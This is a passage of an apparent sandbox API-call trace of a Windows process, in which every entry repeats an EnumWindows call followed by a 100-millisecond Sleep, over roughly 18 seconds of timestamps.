lParam=0x540000) [0193.246] Sleep (dwMilliseconds=0x64) [0193.434] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0193.435] Sleep (dwMilliseconds=0x64) [0193.592] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0193.592] Sleep (dwMilliseconds=0x64) [0193.731] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0193.731] Sleep (dwMilliseconds=0x64) [0193.777] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0193.777] Sleep (dwMilliseconds=0x64) [0193.841] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0193.842] Sleep (dwMilliseconds=0x64) [0193.932] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0193.933] Sleep (dwMilliseconds=0x64) [0194.020] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0194.020] Sleep (dwMilliseconds=0x64) [0194.031] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0194.031] Sleep (dwMilliseconds=0x64) [0194.051] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0194.052] Sleep (dwMilliseconds=0x64) [0194.186] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0194.187] Sleep (dwMilliseconds=0x64) [0194.233] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0194.233] Sleep (dwMilliseconds=0x64) [0194.296] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0194.296] Sleep (dwMilliseconds=0x64) [0194.362] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0194.456] Sleep (dwMilliseconds=0x64) [0194.498] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0194.499] Sleep (dwMilliseconds=0x64) [0194.558] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0194.558] Sleep (dwMilliseconds=0x64) [0194.609] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0194.609] Sleep (dwMilliseconds=0x64) [0194.654] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0194.654] Sleep (dwMilliseconds=0x64) [0194.700] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0194.701] Sleep (dwMilliseconds=0x64) [0194.748] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0194.749] Sleep (dwMilliseconds=0x64) [0194.792] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0194.792] Sleep (dwMilliseconds=0x64) [0194.839] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0194.839] Sleep (dwMilliseconds=0x64) [0194.861] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0194.861] Sleep (dwMilliseconds=0x64) [0194.872] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0194.872] Sleep (dwMilliseconds=0x64) [0194.903] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0194.904] Sleep (dwMilliseconds=0x64) [0194.951] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0194.951] Sleep (dwMilliseconds=0x64) [0195.014] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0195.014] Sleep (dwMilliseconds=0x64) [0195.062] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0195.063] Sleep (dwMilliseconds=0x64) [0195.122] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0195.122] Sleep (dwMilliseconds=0x64) [0195.185] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0195.186] Sleep (dwMilliseconds=0x64) [0195.248] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0195.249] Sleep (dwMilliseconds=0x64) [0195.296] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0195.297] Sleep (dwMilliseconds=0x64) [0195.315] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0195.316] Sleep (dwMilliseconds=0x64) [0195.334] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0195.334] Sleep (dwMilliseconds=0x64) [0195.357] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0195.358] Sleep (dwMilliseconds=0x64) [0195.405] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0195.405] Sleep (dwMilliseconds=0x64) [0195.448] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0195.449] Sleep (dwMilliseconds=0x64) [0195.538] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0195.625] Sleep (dwMilliseconds=0x64) [0195.682] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0195.683] Sleep (dwMilliseconds=0x64) [0195.794] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0195.794] Sleep (dwMilliseconds=0x64) [0195.886] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0195.889] Sleep (dwMilliseconds=0x64) [0195.983] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0195.983] Sleep (dwMilliseconds=0x64) [0196.033] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0196.033] Sleep (dwMilliseconds=0x64) [0196.074] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0196.074] Sleep (dwMilliseconds=0x64) [0196.171] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0196.171] Sleep (dwMilliseconds=0x64) [0196.233] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0196.233] Sleep (dwMilliseconds=0x64) [0196.303] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0196.303] Sleep (dwMilliseconds=0x64) [0196.353] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0196.353] Sleep (dwMilliseconds=0x64) [0196.501] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0196.501] Sleep (dwMilliseconds=0x64) [0196.645] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0196.645] Sleep (dwMilliseconds=0x64) [0196.763] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0196.764] Sleep (dwMilliseconds=0x64) [0196.957] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0196.958] Sleep (dwMilliseconds=0x64) [0197.051] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0197.052] Sleep (dwMilliseconds=0x64) [0197.165] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0197.166] Sleep (dwMilliseconds=0x64) [0197.244] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0197.246] Sleep (dwMilliseconds=0x64) [0197.372] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0197.372] Sleep (dwMilliseconds=0x64) [0197.422] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0197.423] Sleep (dwMilliseconds=0x64) [0197.462] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0197.465] Sleep (dwMilliseconds=0x64) [0197.534] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0197.534] Sleep (dwMilliseconds=0x64) [0197.584] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0197.586] Sleep (dwMilliseconds=0x64) [0197.628] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0197.628] Sleep (dwMilliseconds=0x64) [0197.714] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0197.717] Sleep (dwMilliseconds=0x64) [0197.764] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0197.765] Sleep (dwMilliseconds=0x64) [0197.857] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0197.857] Sleep (dwMilliseconds=0x64) [0197.956] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0197.956] Sleep (dwMilliseconds=0x64) [0198.000] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0198.000] Sleep (dwMilliseconds=0x64) [0198.035] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0198.035] Sleep (dwMilliseconds=0x64) [0198.121] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0198.123] Sleep (dwMilliseconds=0x64) [0198.185] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0198.185] Sleep (dwMilliseconds=0x64) [0198.235] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0198.235] Sleep (dwMilliseconds=0x64) [0198.291] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0198.294] Sleep (dwMilliseconds=0x64) [0198.343] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0198.344] Sleep (dwMilliseconds=0x64) [0198.381] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0198.382] Sleep (dwMilliseconds=0x64) [0198.404] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0198.404] Sleep (dwMilliseconds=0x64) [0198.451] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0198.452] Sleep (dwMilliseconds=0x64) [0198.502] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0198.502] Sleep (dwMilliseconds=0x64) [0198.560] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0198.561] Sleep (dwMilliseconds=0x64) [0198.656] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0198.657] Sleep (dwMilliseconds=0x64) [0198.743] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0198.743] Sleep (dwMilliseconds=0x64) [0198.786] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0198.786] Sleep (dwMilliseconds=0x64) [0198.920] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0198.921] Sleep (dwMilliseconds=0x64) [0198.964] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0198.965] Sleep (dwMilliseconds=0x64) [0198.995] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0198.996] Sleep (dwMilliseconds=0x64) [0199.043] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0199.044] Sleep (dwMilliseconds=0x64) [0199.105] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0199.105] Sleep (dwMilliseconds=0x64) [0199.186] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0199.187] Sleep (dwMilliseconds=0x64) [0199.271] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0199.272] Sleep (dwMilliseconds=0x64) [0199.339] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0199.339] Sleep (dwMilliseconds=0x64) [0199.361] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0199.362] Sleep (dwMilliseconds=0x64) [0199.402] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0199.403] Sleep (dwMilliseconds=0x64) [0199.619] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0199.619] Sleep (dwMilliseconds=0x64) [0199.708] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0199.708] Sleep (dwMilliseconds=0x64) [0199.781] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0199.782] Sleep (dwMilliseconds=0x64) [0199.862] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0199.862] Sleep (dwMilliseconds=0x64) [0199.908] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0199.909] Sleep (dwMilliseconds=0x64) [0199.987] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0199.987] Sleep (dwMilliseconds=0x64) [0200.079] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0200.079] Sleep (dwMilliseconds=0x64) [0200.160] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0200.161] Sleep (dwMilliseconds=0x64) [0200.203] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0200.203] Sleep (dwMilliseconds=0x64) [0200.301] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0200.301] Sleep (dwMilliseconds=0x64) [0200.345] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0200.345] Sleep (dwMilliseconds=0x64) [0200.388] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0200.389] Sleep (dwMilliseconds=0x64) [0200.482] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0200.482] Sleep (dwMilliseconds=0x64) [0200.561] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0200.561] Sleep (dwMilliseconds=0x64) [0200.630] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0200.630] Sleep (dwMilliseconds=0x64) [0200.686] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0200.686] Sleep (dwMilliseconds=0x64) [0200.842] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0200.842] Sleep (dwMilliseconds=0x64) [0200.936] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0200.937] Sleep (dwMilliseconds=0x64) [0201.029] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0201.029] Sleep (dwMilliseconds=0x64) [0201.105] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0201.108] Sleep (dwMilliseconds=0x64) [0201.154] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0201.154] Sleep (dwMilliseconds=0x64) [0201.326] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0201.326] Sleep (dwMilliseconds=0x64) [0201.435] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0201.435] Sleep (dwMilliseconds=0x64) [0201.545] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0201.545] Sleep (dwMilliseconds=0x64) [0201.623] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0201.623] Sleep (dwMilliseconds=0x64) [0201.670] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0201.670] Sleep (dwMilliseconds=0x64) [0201.759] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0201.764] Sleep (dwMilliseconds=0x64) [0201.832] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0201.832] Sleep (dwMilliseconds=0x64) [0201.938] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0201.938] Sleep (dwMilliseconds=0x64) [0202.036] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0202.036] Sleep (dwMilliseconds=0x64) [0202.108] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0202.108] Sleep (dwMilliseconds=0x64) [0202.198] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0202.199] Sleep (dwMilliseconds=0x64) [0202.339] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0202.339] Sleep (dwMilliseconds=0x64) [0202.480] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0202.483] Sleep (dwMilliseconds=0x64) [0202.579] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0202.580] Sleep (dwMilliseconds=0x64) [0202.662] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0202.662] Sleep (dwMilliseconds=0x64) [0202.716] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0202.716] Sleep (dwMilliseconds=0x64) [0202.730] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0202.734] Sleep (dwMilliseconds=0x64) [0202.779] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0202.780] Sleep (dwMilliseconds=0x64) [0202.872] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0202.872] Sleep (dwMilliseconds=0x64) [0202.964] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0202.964] Sleep (dwMilliseconds=0x64) [0203.106] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0203.107] Sleep (dwMilliseconds=0x64) [0203.201] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0203.201] Sleep (dwMilliseconds=0x64) [0203.281] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0203.282] Sleep (dwMilliseconds=0x64) [0203.317] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0203.318] Sleep (dwMilliseconds=0x64) [0203.373] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0203.373] Sleep (dwMilliseconds=0x64) [0203.406] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0203.406] Sleep (dwMilliseconds=0x64) [0203.417] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0203.417] Sleep (dwMilliseconds=0x64) [0203.435] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0203.436] Sleep (dwMilliseconds=0x64) [0203.542] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0203.546] Sleep (dwMilliseconds=0x64) [0203.677] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0203.681] Sleep (dwMilliseconds=0x64) [0203.748] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0203.748] Sleep (dwMilliseconds=0x64) [0203.842] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0203.842] Sleep (dwMilliseconds=0x64) [0203.919] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0203.919] Sleep (dwMilliseconds=0x64) [0203.982] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0203.983] Sleep (dwMilliseconds=0x64) [0204.044] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0204.045] Sleep (dwMilliseconds=0x64) [0204.061] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0204.062] Sleep (dwMilliseconds=0x64) [0204.077] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0204.077] Sleep (dwMilliseconds=0x64) [0204.107] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0204.107] Sleep (dwMilliseconds=0x64) [0204.216] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0204.217] Sleep (dwMilliseconds=0x64) [0204.388] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0204.388] Sleep (dwMilliseconds=0x64) [0204.435] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0204.436] Sleep (dwMilliseconds=0x64) [0204.545] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0204.546] Sleep (dwMilliseconds=0x64) [0204.624] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0204.625] Sleep (dwMilliseconds=0x64) [0204.770] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0204.770] Sleep (dwMilliseconds=0x64) [0205.007] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0205.007] Sleep (dwMilliseconds=0x64) [0205.065] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0205.066] Sleep (dwMilliseconds=0x64) [0205.106] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0205.107] Sleep (dwMilliseconds=0x64) [0205.152] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0205.154] Sleep (dwMilliseconds=0x64) [0205.221] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0205.221] Sleep (dwMilliseconds=0x64) [0205.263] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0205.263] Sleep (dwMilliseconds=0x64) [0205.357] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0205.358] Sleep (dwMilliseconds=0x64) [0205.480] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0205.489] Sleep (dwMilliseconds=0x64) [0205.608] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0205.608] Sleep (dwMilliseconds=0x64) [0205.714] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0205.718] Sleep (dwMilliseconds=0x64) [0205.808] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0205.808] Sleep (dwMilliseconds=0x64) [0205.870] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0205.874] Sleep (dwMilliseconds=0x64) [0205.917] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0205.920] Sleep (dwMilliseconds=0x64) [0206.026] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0206.027] Sleep (dwMilliseconds=0x64) [0206.123] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0206.123] Sleep (dwMilliseconds=0x64) [0206.181] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0206.181] Sleep (dwMilliseconds=0x64) [0206.279] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0206.279] Sleep (dwMilliseconds=0x64) [0206.363] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0206.363] Sleep (dwMilliseconds=0x64) [0206.405] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0206.405] Sleep (dwMilliseconds=0x64) [0206.457] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0206.458] Sleep (dwMilliseconds=0x64) [0206.526] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0206.527] Sleep (dwMilliseconds=0x64) [0206.551] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0206.551] Sleep (dwMilliseconds=0x64) [0206.630] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0206.631] Sleep (dwMilliseconds=0x64) [0206.719] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0206.719] Sleep (dwMilliseconds=0x64) [0207.153] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0207.153] Sleep (dwMilliseconds=0x64) [0207.341] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0207.342] Sleep (dwMilliseconds=0x64) [0207.481] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0207.481] Sleep (dwMilliseconds=0x64) [0207.620] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0207.620] Sleep (dwMilliseconds=0x64) [0207.746] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0207.747] Sleep (dwMilliseconds=0x64) [0207.967] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0207.968] Sleep (dwMilliseconds=0x64) [0207.989] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0207.989] Sleep (dwMilliseconds=0x64) [0208.074] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0208.074] Sleep (dwMilliseconds=0x64) [0208.292] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0208.292] Sleep (dwMilliseconds=0x64) [0208.396] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0208.396] Sleep (dwMilliseconds=0x64) [0208.452] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0208.453] Sleep (dwMilliseconds=0x64) [0208.560] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0208.561] Sleep (dwMilliseconds=0x64) [0208.654] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0208.655] Sleep (dwMilliseconds=0x64) [0208.716] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0208.717] Sleep (dwMilliseconds=0x64) [0208.745] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0208.749] Sleep (dwMilliseconds=0x64) [0208.795] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0208.795] Sleep (dwMilliseconds=0x64) [0208.829] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0208.829] Sleep (dwMilliseconds=0x64) [0208.870] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0208.870] Sleep (dwMilliseconds=0x64) [0208.980] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0208.980] Sleep (dwMilliseconds=0x64) [0209.075] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0209.075] Sleep (dwMilliseconds=0x64) [0209.169] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0209.169] Sleep (dwMilliseconds=0x64) [0209.244] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0209.244] Sleep (dwMilliseconds=0x64) [0209.263] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0209.263] Sleep (dwMilliseconds=0x64) [0209.310] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0209.310] Sleep (dwMilliseconds=0x64) [0209.356] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0209.356] Sleep (dwMilliseconds=0x64) [0209.441] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0209.441] Sleep (dwMilliseconds=0x64) [0209.482] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0209.483] Sleep (dwMilliseconds=0x64) [0209.730] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0209.730] Sleep (dwMilliseconds=0x64) [0209.810] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0209.811] Sleep (dwMilliseconds=0x64) [0209.861] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0209.862] Sleep (dwMilliseconds=0x64) [0209.904] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0209.904] Sleep (dwMilliseconds=0x64) [0209.931] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0209.932] Sleep (dwMilliseconds=0x64) [0209.948] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0209.952] Sleep (dwMilliseconds=0x64) [0210.058] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0210.058] Sleep (dwMilliseconds=0x64) [0210.123] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0210.123] Sleep (dwMilliseconds=0x64) [0210.198] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0210.199] Sleep (dwMilliseconds=0x64) [0210.295] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0210.296] Sleep (dwMilliseconds=0x64) [0210.388] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0210.388] Sleep (dwMilliseconds=0x64) [0210.448] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0210.451] Sleep (dwMilliseconds=0x64) [0210.513] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0210.514] Sleep (dwMilliseconds=0x64) [0210.608] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0210.609] Sleep (dwMilliseconds=0x64) [0210.654] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0210.654] Sleep (dwMilliseconds=0x64) [0210.714] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0210.714] Sleep (dwMilliseconds=0x64) [0210.802] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0210.802] Sleep (dwMilliseconds=0x64) [0210.857] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0210.857] Sleep (dwMilliseconds=0x64) [0210.873] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0210.873] Sleep (dwMilliseconds=0x64) [0210.888] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0210.889] Sleep (dwMilliseconds=0x64) [0210.928] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0210.928] Sleep (dwMilliseconds=0x64) [0210.998] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0210.998] Sleep (dwMilliseconds=0x64) [0211.038] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0211.038] Sleep (dwMilliseconds=0x64) [0211.080] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0211.081] Sleep (dwMilliseconds=0x64) [0211.155] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0211.155] Sleep (dwMilliseconds=0x64) [0211.249] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0211.249] Sleep (dwMilliseconds=0x64) [0211.295] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0211.296] Sleep (dwMilliseconds=0x64) [0211.397] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0211.401] Sleep (dwMilliseconds=0x64) [0211.452] EnumWindows (lpEnumFunc=0x3d23dd0, lParam=0x540000) [0211.453] Sleep 